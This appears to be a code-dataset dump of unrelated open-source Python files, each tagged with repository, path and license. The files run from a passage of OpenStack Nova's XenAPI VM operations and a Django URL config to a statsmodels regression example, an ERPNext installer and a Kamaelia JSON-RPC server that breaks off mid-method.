return {'ip': ip['address'],
'enabled': '1',
'netmask': netmask,
'gateway': get_ip(subnet['gateway'])}
def convert_route(route):
return {'route': str(netaddr.IPNetwork(route['cidr']).network),
'netmask': str(netaddr.IPNetwork(route['cidr']).netmask),
'gateway': get_ip(route['gateway'])}
network = vif['network']
v4_subnets = [subnet for subnet in network['subnets']
if subnet['version'] == 4]
v6_subnets = [subnet for subnet in network['subnets']
if subnet['version'] == 6]
# NOTE(tr3buchet): routes and DNS come from all subnets
routes = [convert_route(route) for subnet in network['subnets']
for route in subnet['routes']]
dns = [get_ip(ip) for subnet in network['subnets']
for ip in subnet['dns']]
info_dict = {'label': network['label'],
'mac': vif['address']}
if v4_subnets:
# NOTE(tr3buchet): gateway and broadcast from first subnet
# primary IP will be from first subnet
# subnets are generally unordered :(
info_dict['gateway'] = get_ip(v4_subnets[0]['gateway'])
info_dict['broadcast'] = str(v4_subnets[0].as_netaddr().broadcast)
info_dict['ips'] = [fixed_ip_dict(ip, subnet)
for subnet in v4_subnets
for ip in subnet['ips']]
if v6_subnets:
# NOTE(tr3buchet): gateway from first subnet
# primary IP will be from first subnet
# subnets are generally unordered :(
info_dict['gateway_v6'] = get_ip(v6_subnets[0]['gateway'])
info_dict['ip6s'] = [fixed_ip_dict(ip, subnet)
for subnet in v6_subnets
for ip in subnet['ips']]
if routes:
info_dict['routes'] = routes
if dns:
info_dict['dns'] = list(set(dns))
return info_dict
def _remove_vif_from_network_info(self, instance, vm_ref, mac):
location = ('vm-data/networking/%s' % mac.replace(':', ''))
self._remove_from_param_xenstore(vm_ref, location)
try:
self._delete_from_xenstore(instance, location,
vm_ref=vm_ref)
except KeyError:
# catch KeyError for domid if instance isn't running
pass
def inject_network_info(self, instance, network_info, vm_ref=None):
"""
Generate the network info and make calls to place it into the
xenstore and the xenstore param list.
vm_ref can be passed in because it will sometimes be different than
what vm_utils.lookup(session, instance['name']) will find (ex: rescue)
"""
vm_ref = vm_ref or self._get_vm_opaque_ref(instance)
LOG.debug(_("Injecting network info to xenstore"), instance=instance)
for vif in network_info:
xs_data = self._vif_xenstore_data(vif)
location = ('vm-data/networking/%s' %
vif['address'].replace(':', ''))
self._add_to_param_xenstore(vm_ref,
location,
jsonutils.dumps(xs_data))
try:
self._write_to_xenstore(instance, location, xs_data,
vm_ref=vm_ref)
except KeyError:
# catch KeyError for domid if instance isn't running
pass
def _get_highest_vif_device_id(self, vm_rec):
"""Enumerates all the VIFs and gets the next highest device id."""
max_device = -1
for device, vif in self._get_vif_device_map(vm_rec).iteritems():
max_device = max(int(device), max_device)
return max_device + 1
def create_vif_for_instance(self, instance, vif_info, hotplug):
vm_ref = vm_utils.lookup(self._session, instance["name"])
vm_rec = self._session.call_xenapi("VM.get_record", vm_ref)
device = self._get_highest_vif_device_id(vm_rec)
vif_rec = self.vif_driver.plug(instance, vif_info,
vm_ref=vm_ref, device=device)
vif_ref = self._session.call_xenapi('VIF.create', vif_rec)
if hotplug:
self._session.call_xenapi('VIF.plug', vif_ref)
return vif_ref
def delete_vif_for_instance(self, instance, vif, hot_unplug):
vm_ref = vm_utils.lookup(self._session, instance["name"])
vm_rec = self._session.call_xenapi("VM.get_record", vm_ref)
for vif_rec in self._get_vifs_for_instance(vm_rec):
if vif_rec["MAC"] == vif["mac_address"]:
vif_ref = self._session.call_xenapi("VIF.get_by_uuid",
vif_rec["uuid"])
if hot_unplug:
self._session.call_xenapi("VIF.unplug", vif_ref)
self._session.call_xenapi("VIF.destroy", vif_ref)
self._remove_vif_from_network_info(instance, vm_ref,
vif["mac_address"])
return
raise Exception(_("No VIF found for instance %s") % instance["uuid"])
def _create_vifs(self, vm_ref, instance, network_info):
"""Creates vifs for an instance."""
LOG.debug(_("Creating vifs"), instance=instance)
# this function raises if vm_ref is not a vm_opaque_ref
self._session.call_xenapi("VM.get_record", vm_ref)
for device, vif in enumerate(network_info):
vif_rec = self.vif_driver.plug(instance, vif,
vm_ref=vm_ref, device=device)
network_ref = vif_rec['network']
LOG.debug(_('Creating VIF for network %(network_ref)s'),
locals(), instance=instance)
vif_ref = self._session.call_xenapi('VIF.create', vif_rec)
LOG.debug(_('Created VIF %(vif_ref)s, network %(network_ref)s'),
locals(), instance=instance)
def plug_vifs(self, instance, network_info):
"""Set up VIF networking on the host."""
for device, vif in enumerate(network_info):
self.vif_driver.plug(instance, vif, device=device)
def unplug_vifs(self, instance, network_info):
if network_info:
for vif in network_info:
self.vif_driver.unplug(instance, vif)
def reset_network(self, instance):
"""Calls resetnetwork method in agent."""
if self.agent_enabled:
vm_ref = self._get_vm_opaque_ref(instance)
agent = self._get_agent(instance, vm_ref)
agent.resetnetwork()
else:
raise NotImplementedError()
def inject_hostname(self, instance, vm_ref, hostname):
"""Inject the hostname of the instance into the xenstore."""
if instance['os_type'] == "windows":
# NOTE(jk0): Windows hostnames can only be <= 15 chars.
hostname = hostname[:15]
LOG.debug(_("Injecting hostname to xenstore"), instance=instance)
self._add_to_param_xenstore(vm_ref, 'vm-data/hostname', hostname)
def inject_provider_data(self, instance, vm_ref, context):
"""Inject provider data for the instance into the xenstore."""
# Store region and roles
self._add_to_param_xenstore(vm_ref, 'vm-data/provider_data/provider',
CONF.provider or '')
self._add_to_param_xenstore(vm_ref, 'vm-data/provider_data/region',
CONF.region or '')
self._add_to_param_xenstore(vm_ref, 'vm-data/provider_data/roles',
jsonutils.dumps(context.roles))
# Now build up the IP whitelist data
location = 'vm-data/provider_data/ip_whitelist'
self._add_to_param_xenstore(vm_ref, location, '')
if CONF.ip_whitelist_file:
idx = 0
with open(CONF.ip_whitelist_file) as f:
for entry in f:
entry = entry.strip()
# Skip blank lines and comments
if not entry or entry[0] == '#':
continue
self._add_to_param_xenstore(vm_ref, '%s/%s' %
(location, idx), entry)
idx += 1
def _write_to_xenstore(self, instance, path, value, vm_ref=None):
"""
Writes the passed value to the xenstore record for the given VM
at the specified location. A XenAPIPlugin.PluginError will be raised
if any error is encountered in the write process.
"""
return self._make_plugin_call('xenstore.py', 'write_record', instance,
vm_ref=vm_ref, path=path,
value=jsonutils.dumps(value))
def _delete_from_xenstore(self, instance, path, vm_ref=None):
"""
Deletes the value from the xenstore record for the given VM at
the specified location. A XenAPIPlugin.PluginError will be
raised if any error is encountered in the delete process.
"""
return self._make_plugin_call('xenstore.py', 'delete_record', instance,
vm_ref=vm_ref, path=path)
def _make_plugin_call(self, plugin, method, instance=None, vm_ref=None,
**addl_args):
"""
Abstracts out the process of calling a method of a xenapi plugin.
Any errors raised by the plugin will in turn raise a RuntimeError here.
"""
args = {}
if instance or vm_ref:
vm_ref = vm_ref or self._get_vm_opaque_ref(instance)
vm_rec = self._session.call_xenapi("VM.get_record", vm_ref)
args['dom_id'] = vm_rec['domid']
args.update(addl_args)
try:
return self._session.call_plugin(plugin, method, args)
except self._session.XenAPI.Failure as e:
err_msg = e.details[-1].splitlines()[-1]
if 'TIMEOUT:' in err_msg:
LOG.error(_('TIMEOUT: The call to %(method)s timed out. '
'args=%(args)r'), locals(), instance=instance)
return {'returncode': 'timeout', 'message': err_msg}
elif 'NOT IMPLEMENTED:' in err_msg:
LOG.error(_('NOT IMPLEMENTED: The call to %(method)s is not'
' supported by the agent. args=%(args)r'),
locals(), instance=instance)
return {'returncode': 'notimplemented', 'message': err_msg}
else:
LOG.error(_('The call to %(method)s returned an error: %(e)s. '
'args=%(args)r'), locals(), instance=instance)
return {'returncode': 'error', 'message': err_msg}
return None
def _add_to_param_xenstore(self, vm_ref, key, val):
"""
Takes a key/value pair and adds it to the xenstore parameter
record for the given vm instance. If the key exists in xenstore,
it is overwritten
"""
self._remove_from_param_xenstore(vm_ref, key)
self._session.call_xenapi('VM.add_to_xenstore_data', vm_ref, key, val)
def _remove_from_param_xenstore(self, vm_ref, key):
"""
Takes a single key and removes it from the xenstore parameter
record data for the given VM.
If the key doesn't exist, the request is ignored.
"""
self._session.call_xenapi('VM.remove_from_xenstore_data', vm_ref, key)
def refresh_security_group_rules(self, security_group_id):
"""recreates security group rules for every instance."""
self.firewall_driver.refresh_security_group_rules(security_group_id)
def refresh_security_group_members(self, security_group_id):
"""recreates security group rules for every instance."""
self.firewall_driver.refresh_security_group_members(security_group_id)
def refresh_instance_security_rules(self, instance):
"""recreates security group rules for specified instance."""
self.firewall_driver.refresh_instance_security_rules(instance)
def refresh_provider_fw_rules(self):
self.firewall_driver.refresh_provider_fw_rules()
def unfilter_instance(self, instance_ref, network_info):
"""Removes filters for each VIF of the specified instance."""
self.firewall_driver.unfilter_instance(instance_ref,
network_info=network_info)
def _get_host_uuid_from_aggregate(self, context, hostname):
current_aggregate = self._virtapi.aggregate_get_by_host(
context, CONF.host, key=pool_states.POOL_FLAG)[0]
if not current_aggregate:
raise exception.AggregateHostNotFound(host=CONF.host)
try:
return current_aggregate.metadetails[hostname]
except KeyError:
reason = _('Destination host:%(hostname)s must be in the same '
'aggregate as the source server')
raise exception.MigrationPreCheckError(reason=reason % locals())
def _ensure_host_in_aggregate(self, context, hostname):
self._get_host_uuid_from_aggregate(context, hostname)
def _get_host_opaque_ref(self, context, hostname):
host_uuid = self._get_host_uuid_from_aggregate(context, hostname)
return self._session.call_xenapi("host.get_by_uuid", host_uuid)
def _migrate_receive(self, ctxt):
destref = self._session.get_xenapi_host()
# Get the network to for migrate.
# This is the one associated with the pif marked management. From cli:
# uuid=`xe pif-list --minimal management=true`
# xe pif-param-get param-name=network-uuid uuid=$uuid
expr = 'field "management" = "true"'
pifs = self._session.call_xenapi('PIF.get_all_records_where',
expr)
if len(pifs) != 1:
msg = _('No suitable network for migrate')
raise exception.MigrationPreCheckError(reason=msg)
nwref = pifs[pifs.keys()[0]]['network']
try:
options = {}
migrate_data = self._session.call_xenapi("host.migrate_receive",
destref,
nwref,
options)
except self._session.XenAPI.Failure as exc:
LOG.exception(exc)
msg = _('Migrate Receive failed')
raise exception.MigrationPreCheckError(reason=msg)
return migrate_data
def _get_iscsi_srs(self, ctxt, instance_ref):
vm_ref = self._get_vm_opaque_ref(instance_ref)
vbd_refs = self._session.call_xenapi("VM.get_VBDs", vm_ref)
iscsi_srs = []
for vbd_ref in vbd_refs:
vdi_ref = self._session.call_xenapi("VBD.get_VDI", vbd_ref)
# Check if it's on an iSCSI SR
sr_ref = self._session.call_xenapi("VDI.get_SR", vdi_ref)
if self._session.call_xenapi("SR.get_type", sr_ref) == 'iscsi':
iscsi_srs.append(sr_ref)
return iscsi_srs
def check_can_live_migrate_destination(self, ctxt, instance_ref,
block_migration=False,
disk_over_commit=False):
"""Check if it is possible to execute live migration.
:param context: security context
:param instance_ref: nova.db.sqlalchemy.models.Instance object
:param block_migration: if true, prepare for block migration
:param disk_over_commit: if true, allow disk over commit
"""
dest_check_data = {}
if block_migration:
migrate_send_data = self._migrate_receive(ctxt)
destination_sr_ref = vm_utils.safe_find_sr(self._session)
dest_check_data.update(
{"block_migration": block_migration,
"migrate_data": {"migrate_send_data": migrate_send_data,
"destination_sr_ref": destination_sr_ref}})
else:
src = instance_ref['host']
self._ensure_host_in_aggregate(ctxt, src)
# TODO(johngarbutt) we currently assume
# instance is on a SR shared with other destination
# block migration work will be able to resolve this
return dest_check_data
def _is_xsm_sr_check_relaxed(self):
try:
return self.cached_xsm_sr_relaxed
except AttributeError:
config_value = None
try:
config_value = self._make_plugin_call('config_file',
'get_val',
key='relax-xsm-sr-check')
except Exception as exc:
LOG.exception(exc)
self.cached_xsm_sr_relaxed = config_value == "true"
return self.cached_xsm_sr_relaxed
def check_can_live_migrate_source(self, ctxt, instance_ref,
dest_check_data):
"""Check if it's possible to execute live migration on the source side.
:param context: security context
:param instance_ref: nova.db.sqlalchemy.models.Instance object
:param dest_check_data: data returned by the check on the
destination, includes block_migration flag
"""
if len(self._get_iscsi_srs(ctxt, instance_ref)) > 0:
# XAPI must support the relaxed SR check for live migrating with
# iSCSI VBDs
if not self._is_xsm_sr_check_relaxed():
raise exception.MigrationError(_('XAPI supporting '
'relax-xsm-sr-check=true requried'))
if 'migrate_data' in dest_check_data:
vm_ref = self._get_vm_opaque_ref(instance_ref)
migrate_data = dest_check_data['migrate_data']
try:
self._call_live_migrate_command(
"VM.assert_can_migrate", vm_ref, migrate_data)
except self._session.XenAPI.Failure as exc:
LOG.exception(exc)
msg = _('VM.assert_can_migrate failed')
raise exception.MigrationPreCheckError(reason=msg)
return dest_check_data
def _generate_vdi_map(self, destination_sr_ref, vm_ref, sr_ref=None):
"""generate a vdi_map for _call_live_migrate_command."""
if sr_ref is None:
sr_ref = vm_utils.safe_find_sr(self._session)
vm_vdis = vm_utils.get_instance_vdis_for_sr(self._session,
vm_ref, sr_ref)
return dict((vdi, destination_sr_ref) for vdi in vm_vdis)
def _call_live_migrate_command(self, command_name, vm_ref, migrate_data):
"""unpack xapi specific parameters, and call a live migrate command."""
destination_sr_ref = migrate_data['destination_sr_ref']
migrate_send_data = migrate_data['migrate_send_data']
vdi_map = self._generate_vdi_map(destination_sr_ref, vm_ref)
# Add destination SR refs for all of the VDIs that we created
# as part of the pre migration callback
if 'pre_live_migration_result' in migrate_data:
pre_migrate_data = migrate_data['pre_live_migration_result']
sr_uuid_map = pre_migrate_data.get('sr_uuid_map', [])
for sr_uuid in sr_uuid_map:
# Source and destination SRs have the same UUID, so get the
# reference for the local SR
sr_ref = self._session.call_xenapi("SR.get_by_uuid", sr_uuid)
vdi_map.update(
self._generate_vdi_map(
sr_uuid_map[sr_uuid], vm_ref, sr_ref))
vif_map = {}
options = {}
self._session.call_xenapi(command_name, vm_ref,
migrate_send_data, True,
vdi_map, vif_map, options)
def live_migrate(self, context, instance, destination_hostname,
post_method, recover_method, block_migration,
migrate_data=None):
try:
vm_ref = self._get_vm_opaque_ref(instance)
if block_migration:
if not migrate_data:
raise exception.InvalidParameterValue('Block Migration '
'requires migrate data from destination')
iscsi_srs = self._get_iscsi_srs(context, instance)
try:
self._call_live_migrate_command(
"VM.migrate_send", vm_ref, migrate_data)
except self._session.XenAPI.Failure as exc:
LOG.exception(exc)
raise exception.MigrationError(_('Migrate Send failed'))
# Tidy up the iSCSI SRs
for sr_ref in iscsi_srs:
volume_utils.forget_sr(self._session, sr_ref)
else:
host_ref = self._get_host_opaque_ref(context,
destination_hostname)
self._session.call_xenapi("VM.pool_migrate", vm_ref,
host_ref, {})
post_method(context, instance, destination_hostname,
block_migration)
except Exception:
with excutils.save_and_reraise_exception():
recover_method(context, instance, destination_hostname,
block_migration)
def get_per_instance_usage(self):
"""Get usage info about each active instance."""
usage = {}
def _is_active(vm_rec):
power_state = vm_rec['power_state'].lower()
return power_state in ['running', 'paused']
def _get_uuid(vm_rec):
other_config = vm_rec['other_config']
return other_config.get('nova_uuid', None)
for vm_ref, vm_rec in vm_utils.list_vms(self._session):
uuid = _get_uuid(vm_rec)
if _is_active(vm_rec) and uuid is not None:
memory_mb = int(vm_rec['memory_static_max']) / 1024 / 1024
usage[uuid] = {'memory_mb': memory_mb, 'uuid': uuid}
return usage
def attach_block_device_volumes(self, block_device_info):
sr_uuid_map = {}
try:
if block_device_info is not None:
for block_device_map in block_device_info[
'block_device_mapping']:
sr_uuid, _ = self._volumeops.attach_volume(
block_device_map['connection_info'],
None,
block_device_map['mount_device'],
hotplug=False)
sr_ref = self._session.call_xenapi('SR.get_by_uuid',
sr_uuid)
sr_uuid_map[sr_uuid] = sr_ref
except Exception:
with excutils.save_and_reraise_exception():
# Disconnect the volumes we just connected
for sr in sr_uuid_map:
volume_utils.forget_sr(self._session, sr_uuid_map[sr_ref])
return sr_uuid_map
|
sridevikoushik31/nova
|
nova/virt/xenapi/vmops.py
|
Python
|
apache-2.0
| 88,390
| 0.000645
|
from django.conf.urls import patterns, url
urlpatterns = patterns('',
url(r'^$', 'recollect.views.home', name='home'),
url(r'^albums$', 'recollect.views.albums', name='albums'),
url(r'^album/(?P<album_slug>[A-z0-9-]+)$', 'recollect.views.album', name='album'),
)
|
richbs/django-record-collector
|
recollect/urls.py
|
Python
|
bsd-3-clause
| 275
| 0.007273
|
# -*- coding: utf-8 -*-
# Copyright (C) 2010 Holoscópio Tecnologia
# Author: Luciana Fujii Pontello <luciana@holoscopio.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
import gobject
import gtk
from sltv.settings import UI_DIR
from core import InputUI
class AutoAudioInputUI(InputUI):
def __init__(self):
InputUI.__init__(self)
def get_widget(self):
return None
def get_name(self):
return "AutoAudio"
def get_description(self):
return "Auto Audio Source"
|
Geheimorganisation/sltv
|
sltv/ui/input/autoaudioinput.py
|
Python
|
gpl-2.0
| 1,172
| 0.000854
|
"""
Author: Eric J. Ma
License: MIT
A Python module that provides helper functions and variables for encoding amino
acid features in the protein interaction network. We encode features in order
to feed the data into the neural fingerprinting software later on.
"""
amino_acids = [
"A",
"B",
"C",
"D",
"E",
"F",
"G",
"H",
"I",
"J",
"K",
"L",
"M",
"N",
"P",
"Q",
"R",
"S",
"T",
"V",
"W",
"X",
"Y",
"Z",
]
|
ericmjl/protein-interaction-network
|
proteingraph/features.py
|
Python
|
mit
| 501
| 0
|
from abc import ABCMeta, abstractmethod
class NotificationSource():
"""
Abstract class for all notification sources.
"""
__metaclass__ = ABCMeta
@abstractmethod
def poll(self):
"""
Used to get a set of changes between data retrieved in this call and the last.
"""
raise NotImplementedError('No concrete implementation!')
@abstractmethod
def name(self):
"""
Returns a unique name for the source type.
"""
raise NotImplementedError('No concrete implementation!')
|
DanNixon/Sakuya
|
pc_client/sakuyaclient/NotificationSource.py
|
Python
|
apache-2.0
| 562
| 0.001779
|
# -*- coding: utf-8 -*-
"""Example: Test for equality of coefficients across groups/regressions
Created on Sat Mar 27 22:36:51 2010
Author: josef-pktd
"""
import numpy as np
from scipy import stats
#from numpy.testing import assert_almost_equal
import scikits.statsmodels as sm
from scikits.statsmodels.sandbox.regression.onewaygls import OneWayLS
#choose example
#--------------
example = ['null', 'diff'][1] #null: identical coefficients across groups
example_size = [10, 100][0]
example_size = [(10,2), (100,2)][0]
example_groups = ['2', '2-2'][1]
#'2-2': 4 groups,
# groups 0 and 1 and groups 2 and 3 have identical parameters in DGP
#generate example
#----------------
np.random.seed(87654589)
nobs, nvars = example_size
x1 = np.random.normal(size=(nobs, nvars))
y1 = 10 + np.dot(x1,[15.]*nvars) + 2*np.random.normal(size=nobs)
x1 = sm.add_constant(x1) #, prepend=True)
#assert_almost_equal(x1, np.vander(x1[:,0],2), 16)
#res1 = sm.OLS(y1, x1).fit()
#print res1.params
#print np.polyfit(x1[:,0], y1, 1)
#assert_almost_equal(res1.params, np.polyfit(x1[:,0], y1, 1), 14)
#print res1.summary(xname=['x1','const1'])
#regression 2
x2 = np.random.normal(size=(nobs,nvars))
if example == 'null':
y2 = 10 + np.dot(x2,[15.]*nvars) + 2*np.random.normal(size=nobs) # if H0 is true
else:
y2 = 19 + np.dot(x2,[17.]*nvars) + 2*np.random.normal(size=nobs)
x2 = sm.add_constant(x2)
# stack
x = np.concatenate((x1,x2),0)
y = np.concatenate((y1,y2))
if example_groups == '2':
groupind = (np.arange(2*nobs)>nobs-1).astype(int)
else:
groupind = np.mod(np.arange(2*nobs),4)
groupind.sort()
#x = np.column_stack((x,x*groupind[:,None]))
def print_results(res):
groupind = res.groups
#res.fitjoint() #not really necessary, because called by ftest_summary
ft = res.ftest_summary()
#print ft[0] #skip because table is nicer
print '\nTable of F-tests for overall or pairwise equality of coefficients'
print 'hypothesis F-statistic p-value df_denom df_num reject'
for row in ft[1]:
print row,
if row[1][1]<0.05:
print '*'
else:
print ''
print 'Notes: p-values are not corrected for many tests'
print ' (no Bonferroni correction)'
print ' * : reject at 5% uncorrected confidence level'
print 'Null hypothesis: all or pairwise coefficient are the same'
print 'Alternative hypothesis: all coefficients are different'
print '\nComparison with stats.f_oneway'
print stats.f_oneway(*[y[groupind==gr] for gr in res.unique])
print '\nLikelihood Ratio Test'
print 'likelihood ratio p-value df'
print res.lr_test()
print 'Null model: pooled all coefficients are the same across groups,'
print 'Alternative model: all coefficients are allowed to be different'
print 'not verified but looks close to f-test result'
print '\nOls parameters by group from individual, separate ols regressions'
for group in sorted(res.olsbygroup):
r = res.olsbygroup[group]
print group, r.params
print '\nCheck for heteroscedasticity, '
print 'variance and standard deviation for individual regressions'
print ' '*12, ' '.join('group %-10s' %(gr) for gr in res.unique)
print 'variance ', res.sigmabygroup
print 'standard dev', np.sqrt(res.sigmabygroup)
#get results for example
#-----------------------
print '\nTest for equality of coefficients for all exogenous variables'
print '-------------------------------------------------------------'
res = OneWayLS(y,x, groups=groupind.astype(int))
print_results(res)
print '\n\nOne way ANOVA, constant is the only regressor'
print '---------------------------------------------'
print 'this is the same as scipy.stats.f_oneway'
res = OneWayLS(y,np.ones(len(y)), groups=groupind)
print_results(res)
print '\n\nOne way ANOVA, constant is the only regressor with het is true'
print '--------------------------------------------------------------'
print 'this is the similar to scipy.stats.f_oneway,'
print 'but variance is not assumed to be the same across groups'
res = OneWayLS(y,np.ones(len(y)), groups=groupind, het=True)
print_results(res)
|
matthew-brett/draft-statsmodels
|
scikits/statsmodels/sandbox/examples/ex_onewaygls.py
|
Python
|
bsd-3-clause
| 4,198
| 0.010005
|
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe import _
default_mail_footer = """<div style="padding: 7px; text-align: right; color: #888"><small>Sent via
<a style="color: #888" href="http://erpnext.org">ERPNext</a></div>"""
def after_install():
frappe.get_doc({'doctype': "Role", "role_name": "Analytics"}).insert()
set_single_defaults()
create_compact_item_print_custom_field()
from frappe.desk.page.setup_wizard.setup_wizard import add_all_roles_to
add_all_roles_to("Administrator")
frappe.db.commit()
def check_setup_wizard_not_completed():
if frappe.db.get_default('desktop:home_page') == 'desktop':
print
print "ERPNext can only be installed on a fresh site where the setup wizard is not completed"
print "You can reinstall this site (after saving your data) using: bench --site [sitename] reinstall"
print
return False
def set_single_defaults():
for dt in frappe.db.sql_list("""select name from `tabDocType` where issingle=1"""):
default_values = frappe.db.sql("""select fieldname, `default` from `tabDocField`
where parent=%s""", dt)
if default_values:
try:
b = frappe.get_doc(dt, dt)
for fieldname, value in default_values:
b.set(fieldname, value)
b.save()
except frappe.MandatoryError:
pass
frappe.db.set_default("date_format", "dd-mm-yyyy")
def create_compact_item_print_custom_field():
from frappe.custom.doctype.custom_field.custom_field import create_custom_field
create_custom_field('Print Settings', {
'label': _('Compact Item Print'),
'fieldname': 'compact_item_print',
'fieldtype': 'Check',
'default': 1,
'insert_after': 'with_letterhead'
})
|
anandpdoshi/erpnext
|
erpnext/setup/install.py
|
Python
|
agpl-3.0
| 1,780
| 0.024719
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2010 British Broadcasting Corporation and Kamaelia Contributors(1)
#
# (1) Kamaelia Contributors are listed in the AUTHORS file and at
# http://www.kamaelia.org/AUTHORS - please extend this file,
# not this notice.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -------------------------------------------------------------------------
'''
Bi-directional JsonRPC Server and Client for Kamaelia.
Copyright (c) 2009 Rasjid Wilcox and CDG Computer Services.
Licensed to the BBC under a Contributor Agreement
'''
import Axon
from Axon.Handle import Handle
from Axon.background import background
from Axon.Ipc import shutdownMicroprocess, producerFinished
from Kamaelia.Chassis.ConnectedServer import ServerCore
from Kamaelia.Chassis.Pipeline import Pipeline
from Kamaelia.Chassis.Graphline import Graphline
from Kamaelia.Internet.TCPClient import TCPClient
from jsonrpc import JsonRpc20, RPCFault, METHOD_NOT_FOUND, INTERNAL_ERROR, ERROR_MESSAGE, REQUEST, RESPONSE, ERROR, json_split
from traceback import format_exc
from collections import defaultdict
import types, inspect, Queue
# FIXME: add protection from Denial of Service
# decorators to mark funcation args as either
# callback requests or callback notifications
def cb_request(arg_name, response_func, convert_args = False):
def cb_request_dec(func):
if not hasattr(func, '_callbacks_'):
func._callbacks_ = {}
if response_func:
func._callbacks_[arg_name] = ResponseCallback(response_func, convert_args)
else:
func._callbacks_[arg_name] = None
return func
return cb_request_dec
def cb_notification(arg_name):
return cb_request(arg_name, None)
class ResponseCallback(object):
def __init__(self, callback_func, convert_args = False):
'''if convert_args then convert a list, tuple or dict to args in standard jsonrpc way'''
self.callback_func = callback_func
self.convert_args = convert_args
class RequestOrNotification(object):
'If response_callback is None, then this is a notification'
def __init__(self, method, params = None, response_callback = None):
if response_callback: assert isinstance(response_callback, ResponseCallback)
self.method = method
self.params = params
self.response_callback = response_callback
class JsonRpcProtocol(object):
'Protocol Factory for JsonRpc over TCP'
def __init__(self, task_runner, id_prefix = 'server', debug = 0):
self.task_runner = task_runner
self.id_prefix = id_prefix
self.debug = debug
self.dispatch_table = {}
self.callback_table = defaultdict(dict) # try key on actual function
self.requests_on_connect = []
self.requests_on_connect_wait = None # id of request to wait for before sending next
self.requests_sent = {}
self._request_id_num = 1
self.connections = []
def get_request_id(self, request):
req_num = self._request_id_num
if self.id_prefix:
request_id = '%s-%s' % (self.id_prefix, req_num)
else:
request_id = req_num
assert isinstance(request, RequestOrNotification)
self.requests_sent[request_id] = request.response_callback
if request.response_callback:
self.add_callbacks(request.response_callback)
self._request_id_num += 1
return request_id
def add_callbacks(self, function):
if function in self.callback_table:
# already in callback table, so just return
return
if hasattr(function, '_callbacks_'): # 'response_callback'):
for arg_name, response_callback in function._callbacks_.items():
name = function.__name__
self.callback_table[function][arg_name] = response_callback
print 'Added callback for method %s, argument %s' % (name, arg_name)
try:
# args by position - offset needed for instance methods etc
offset = 1 if (hasattr(function, 'im_self') and function.im_self) else 0
arg_num = inspect.getargspec(function)[0].index(arg_name) - offset
self.callback_table[function][arg_num] = response_callback
print 'Added callback for method %s, arg_num %s' % (name, arg_num)
except ValueError:
print 'WARNING: unable to determine argument position for callback on method %s, argument %s.\n' \
'Automatic callback conversion will not occur if called by position.' % (name, arg_name)
def add_function(self, function, name = None):
if name is None:
name = function.__name__
if name in self.dispatch_table:
raise ValueError('rpc method %s already exists!' % name)
self.dispatch_table[name] = function
print 'Added rpc method %s' % name
self.add_callbacks(function)
def add_instance(self, instance, prefix = None):
'''Add all callable attributes of an instance not starting with '_'.
If prefix is none, then the rpc name is just <method_name>,
otherwise it is '<prefix>.<method_name>
'''
for name in dir(instance):
if name[0] != '_':
func = getattr(instance, name, None)
if type(func) == types.MethodType:
if prefix:
rpcname = '%s.%s' % (prefix, func.__name__)
else:
rpcname = func.__name__
self.add_function(func, name = rpcname)
def add_request_on_connect(self, req_or_notification, wait = True):
self.requests_on_connect.append( (req_or_notification, wait) )
def __call__(self, **kwargs):
if self.debug >= 1:
print 'Creating new Protocol Factory: ', str(kwargs)
connection = Graphline( SPLITTER = JsonSplitter(debug = self.debug, factory = self, **kwargs),
DESERIALIZER = Deserializer(debug = self.debug, factory = self, **kwargs),
DISPATCHER = Dispatcher(debug = self.debug, factory = self, **kwargs),
RESPONSESERIALIZER = ResponseSerializer(debug = self.debug, factory = self, **kwargs),
REQUESTSERIALIZER = RequestSerializer(debug = self.debug, factory = self, **kwargs),
FINALIZER = Finalizer(debug = self.debug, factory = self, **kwargs),
TASKRUNNER = self.task_runner,
linkages = { ('self', 'inbox') : ('SPLITTER', 'inbox'),
('self', 'request') : ('REQUESTSERIALIZER', 'request'),
('SPLITTER', 'outbox') : ('DESERIALIZER', 'inbox'),
('DESERIALIZER', 'outbox'): ('DISPATCHER', 'inbox'),
('DESERIALIZER', 'error'): ('RESPONSESERIALIZER', 'inbox'),
('DISPATCHER', 'outbox') : ('TASKRUNNER', 'inbox'),
('DISPATCHER', 'result_out') : ('RESPONSESERIALIZER', 'inbox'),
('DISPATCHER', 'request_out') : ('REQUESTSERIALIZER', 'request'),
('RESPONSESERIALIZER', 'outbox') : ('self', 'outbox'),
('REQUESTSERIALIZER', 'outbox'): ('self', 'outbox'),
('self', 'control') : ('SPLITTER', 'control'),
('SPLITTER', 'signal') : ('DESERIALIZER', 'control'),
('DESERIALIZER', 'signal'): ('DISPATCHER', 'control'),
('DISPATCHER', 'signal') : ('RESPONSESERIALIZER', 'control'),
('RESPONSESERIALIZER', 'signal') : ('REQUESTSERIALIZER', 'control'),
('REQUESTSERIALIZER', 'signal') : ('FINALIZER', 'control'),
('FINALIZER', 'signal') : ('self', 'signal'),
('DISPATCHER', 'wake_requester') : ('REQUESTSERIALIZER', 'control'),
} )
self.connections.append(connection)
return connection
class JsonSplitter(Axon.Component.component):
Inboxes = { 'inbox': 'accepts arbitrary (sequential) pieces of json stings',
'control': 'incoming shutdown requests' }
Outboxes = { 'outbox': 'a single complete json string',
'signal': 'outgoing shutdown requests' }
def __init__(self, **kwargs):
super(JsonSplitter, self).__init__(**kwargs)
self.partial_data = ''
if self.debug >= 3: print 'Created %s' % repr(self)
def main(self):
while not self.shutdown():
if self.dataReady('inbox'):
data = self.recv('inbox')
if self.debug >= 4: print 'Got data: <<%s>>' % data
